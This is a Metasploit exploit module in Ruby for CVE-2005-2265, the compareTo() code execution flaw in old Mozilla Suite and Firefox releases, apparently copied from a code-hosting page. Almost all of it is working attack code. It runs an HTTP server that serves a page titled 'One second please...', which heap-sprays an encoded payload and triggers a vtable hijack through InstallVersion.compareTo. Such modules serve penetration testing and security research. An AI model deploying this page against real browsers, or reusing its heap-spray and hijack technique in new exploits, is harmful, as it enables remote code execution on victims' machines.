Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  #
10
  # This module acts as an HTTP server
11
  #
12
  include Msf::Exploit::Remote::HttpServer::HTML
13

14
  #include Msf::Exploit::Remote::BrowserAutopwn
15
  # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10
16
  # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.
17
  #autopwn_info({
18
  #  :ua_name => HttpClients::FF,
19
  #  :ua_minver => "1.0",
20
  #  :ua_maxver => "1.7.10",
21
  #  :os_name => OperatingSystems::Match::WINDOWS,
22
  #  :javascript => true,
23
  #  :rank => NormalRanking, # reliable memory corruption
24
  #  :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
25
  #})
26

27
  def initialize(info = {})
28
    super(update_info(info,
29
      'Name'           => 'Mozilla Suite/Firefox compareTo() Code Execution',
30
      'Description'    => %q{
31
          This module exploits a code execution vulnerability in the Mozilla
32
        Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
33
        module is a direct port of Aviv Raff's HTML PoC.
34
      },
35
      'License'        => MSF_LICENSE,
36
      'Author'         =>  ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],
37
      'References'     =>
38
        [
39
          ['CVE',    '2005-2265'],
40
          ['OSVDB',  '17968'],
41
          ['BID',    '14242'],
42
          ['URL',    'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
43
        ],
44
      'Payload'        =>
45
        {
46
          'Space'    => 400,
47
          'BadChars' => "\x00",
48
        },
49
      'Platform'       => %w{ win },
50
      'Targets'        =>
51
        [
52
          # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
53
          # WinXP-SP3 and Win2kAS-SP0
54
          [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
55
            {
56
              'Platform' => 'win',
57
              'Arch' => ARCH_X86,
58
              'Ret' => 0x0c0c0c0c,
59
            }
60
          ],
61
        ],
62
      'DefaultTarget'  => 0,
63
      'DisclosureDate' => '2005-07-13'
64
      ))
65
  end
66

67
  def on_request_uri(cli, request)
68

69
    # Re-generate the payload
70
    return if ((p = regenerate_payload(cli)) == nil)
71

72
    print_status("Sending #{self.name}")
73
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
74

75
    # Handle the payload
76
    handler(cli)
77
  end
78

79
  def generate_html(payload)
80

81
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
82
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
83

84
    spray_to = sprintf("0x%.8x", target.ret)
85
    spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
86
    spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
87
    eax_address = sprintf("0x%.8x", target.ret)
88

89
    return %Q|
90
<html>
91
<head>
92
<!--
93
  Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
94
  From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
95
  Greets: SkyLined, The Insider and shutdown
96
-->
97
  <title>One second please...</title>
98
  <script language="javascript">
99

100
    function BodyOnLoad()
101
    {
102
      location.href="javascript:void (new InstallVersion());";
103
      CrashAndBurn();
104
    };
105

106
    #{js_heap_spray}
107
    // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
108
    function CrashAndBurn()
109
    {
110
      // Payload - Just return..
111
      var payLoadCode=unescape("#{enc_code}");
112

113
      // Size of the heap blocks
114
      var heapBlockSize=0x400000;
115
      sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));
116

117
      // Set address to fake "pdata".
118
      var eaxAddress = #{eax_address};
119

120
      //	This was taken from shutdown's PoC in bugzilla
121
      // struct vtbl { void (*code)(void); };
122
      // struct data { struct vtbl *pvtbl; };
123
      //
124
      // struct data *pdata = (struct data *)(xxAddress & ~0x01);
125
      // pdata->pvtbl->code(pdata);
126
      //
127
      (new InstallVersion).compareTo(new Number(eaxAddress >> 1));
128
    }
129
// -->
130
  </script>
131
</head>
132
<body onload="BodyOnLoad()">
133
</body>
134
</html>
135
    |
136
  end
137
end
138

139